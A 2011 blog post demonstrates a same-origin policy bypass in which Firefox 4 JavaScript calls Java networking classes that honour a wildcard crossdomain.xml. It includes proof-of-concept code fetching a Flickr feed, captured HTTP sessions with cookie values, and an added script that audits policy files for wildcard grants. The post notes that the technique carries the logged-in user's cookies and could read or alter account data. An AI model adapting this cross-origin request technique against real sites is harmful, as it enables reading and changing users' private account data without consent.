Wednesday, April 27, 2011

How to work around the same-origin policy using crossdomain.xml and Java in <script> tags

I was just messing around with calling Java classes from JavaScript (Firefox 4) when I realised that a lenient crossdomain.xml policy, as honoured by java.net, lets a page make a request to, and read the response from, a completely different server inside the applet container, thereby working around the same-origin policy.

So I started with Flickr (there are many Flickr applet apps from which feed-connection code can be borrowed); below is the cross-domain policy on api.flickr.com.

http://api.flickr.com/crossdomain.xml

Then I borrowed the applet code (a hello-world example of how to use java.net) and modified it to run from JavaScript in <script> tags and fetch the Flickr Atom feed. The result is a request from the Blogger page to Flickr, and the response to the Flickr feed request shown in a text box (you could also display it with alert() instead of the text box used in the example below).

This currently works only in Firefox. Compare the output with the original feed.



// LiveConnect: JavaScript calling Java classes directly (Firefox 4 with the Java plugin).
// Open a connection to the Flickr Atom feed; the applet sandbox consults
// http://api.flickr.com/crossdomain.xml before it allows the cross-origin request.
var urlStr = new java.net.URL("http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom");
var urlCn = urlStr.openConnection();
var a = new java.io.BufferedReader(new java.io.InputStreamReader(urlCn.getInputStream()));
// Collect the status line (header field 0) and the first seven response headers.
var b = urlCn.getHeaderField(0);
for (var i = 1; i <= 7; i++)
  b = b+"\n"+urlCn.getHeaderFieldKey(i)+": "+urlCn.getHeaderField(i);
b = b+"\n\n";
// Append the response body line by line.
var inputLine = "";
while ((inputLine = a.readLine()) != null)
  b = b+"\n"+inputLine;
// Alternative: write the response into the page itself instead of an AWT window.
//c=document.getElementById("page_content")
//c.innerHTML = b;
// Show the result in an AWT text area (45 rows x 600 columns) inside its own frame.
var f = new java.awt.Frame("TEST");
var ta = new java.awt.TextArea(b, 45, 600);
f.add("Center", ta);
f.pack();
f.show();
BTW, the cookies set for flickr.com do go along with this API call. This means that, if the cross-domain policy allows it, one can invoke application actions on flickr.com and use the response (read or export the logged-in user's contacts, or change settings).
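As an added defensive example (not code from the original post), here is a small Node.js checker that flags the crossdomain.xml settings the technique above depends on: a wildcard allow-access-from, secure="false", and a site-control value that lets other policy files widen access. The sample policy is constructed to match the api.flickr.com one captured below; the element scanner is a minimal regex parser, adequate for well-formed policy files.

```javascript
// Audit a crossdomain.xml policy for over-permissive settings.
// Added example, no external XML library needed.

// Constructed sample modelled on the api.flickr.com policy in the capture.
const SAMPLE_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
  <site-control permitted-cross-domain-policies="master-only" />
</cross-domain-policy>`;

// Find every <tagName ...> start tag and return its attributes as an object.
function elements(xml, tagName) {
  const tagRe = new RegExp(`<${tagName}\\b([^>]*?)\\/?>`, 'g');
  const attrRe = /([\w:-]+)\s*=\s*"([^"]*)"/g;
  const out = [];
  let m;
  while ((m = tagRe.exec(xml)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1]] = a[2];
    out.push(attrs);
  }
  return out;
}

// Return a list of findings; an empty list means nothing risky was spotted.
function auditPolicy(xml) {
  const findings = [];
  for (const e of elements(xml, 'allow-access-from')) {
    const d = e.domain || '';
    if (d === '*') {
      findings.push('allow-access-from domain="*": any site may read responses, with the user\'s cookies attached');
    } else if (d.startsWith('*.')) {
      findings.push(`wildcard subdomain grant ${d}: every subdomain is trusted`);
    }
    if (e.secure === 'false') {
      findings.push(`secure="false" for ${d}: plain-HTTP origins may read HTTPS responses`);
    }
  }
  for (const s of elements(xml, 'site-control')) {
    const p = s['permitted-cross-domain-policies'];
    if (p && p !== 'master-only' && p !== 'none') {
      findings.push(`permitted-cross-domain-policies="${p}": policy files elsewhere on the host can widen access`);
    }
  }
  return findings;
}

console.log(auditPolicy(SAMPLE_POLICY));
```

Run it against the policy fetched from your own hosts; the Flickr-style sample yields exactly one finding, the wildcard grant.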

Captured session #113: 200 HTTP api.flickr.com /crossdomain.xml (body 265 bytes, caching: private, Content-Type: text/xml, process java:6600)


GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: api.flickr.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t


HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:03 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Vary: Accept-Encoding
X-Served-By: www151.flickr.mud.yahoo.com
Cache-Control: private
Content-Type: text/xml
Content-length: 265
Connection: Keep-Alive

<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*">
    <site-control policies="master-only"> </site-control>
  </allow-access-from>
</cross-domain-policy>


Captured session #114: 301 HTTP www.macromedia.com /xml/dtds/cross-domain-policy.dtd (body 261 bytes, caching: max-age=900, Expires: Thu, 28 Apr 2011 05:53:41 GMT, Content-Type: text/html; charset=iso-8859-1, process java:6600)



GET /xml/dtds/cross-domain-policy.dtd HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: www.macromedia.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BCSI-CS9B232E0E=2


HTTP/1.1 301 Moved Permanently
Date: Thu, 28 Apr 2011 05:38:41 GMT
Server: Apache
Location: http://www.adobe.com/xml/dtds/cross-domain-policy.dtd
Cache-Control: max-age=900
Expires: Thu, 28 Apr 2011 05:53:41 GMT
Content-Type: text/html; charset=iso-8859-1
Content-length: 261
Connection: Keep-Alive
Age: 201

<title>301 Moved Permanently</title> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">here</a>.</p>

Captured session #116: 200 HTTP api.flickr.com /services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom (body 27,652 bytes, caching: no-store, no-cache, must-revalidate, private, Expires: Mon, 26 Jul 1997 05:00:00 GMT, Content-Type: application/atom+xml; charset=utf-8, process java:6600)



GET /services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom HTTP/1.1
accept-encoding: gzip
Host: api.flickr.com
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
If-Modified-Since: Mon, 25 Apr 2011 04:16:01 GMT
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t



HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 04:16:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www78.flickr.mud.yahoo.com
Content-Type: application/atom+xml; charset=utf-8
Connection: Keep-Alive
Content-Length: 27652

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:flickr="urn:flickr:" xmlns:media="http://search.yahoo.com/mrss/">
  <title>Uploads from Joshua Marinacci</title>
  <link rel="self" href="http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&amp;lang=en-us&amp;format=atom">
  <link rel="alternate" type="text/html" href="http://www.flickr.com/photos/joshyx/">
  <id>tag:flickr.com,2005:/photos/public/1850619</id>
  <icon>http://farm1.static.flickr.com/60/buddyicons/31706743@N00.jpg?1184425730#31706743@N00</icon>
  <subtitle></subtitle>
  <updated>2011-04-25T04:16:01Z</updated>
</feed>
